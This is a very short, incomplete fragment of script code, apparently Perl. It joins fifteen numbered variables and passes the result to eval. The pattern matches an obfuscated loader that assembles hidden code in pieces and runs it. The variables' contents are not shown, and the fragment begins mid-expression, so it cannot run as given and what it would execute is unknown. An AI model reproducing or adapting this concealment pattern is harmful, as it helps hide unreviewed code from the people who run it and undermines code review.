$nkc1701.$nkc1702.$nkc1703.$nkc1704.$nkc1705.$nkc1706.$nkc1707.$nkc1708.$nkc1709.$nkc1710.$nkc1711.$nkc1712.$nkc1713.$nkc1714.$nkc1715;$c='nkc';eval $nkc;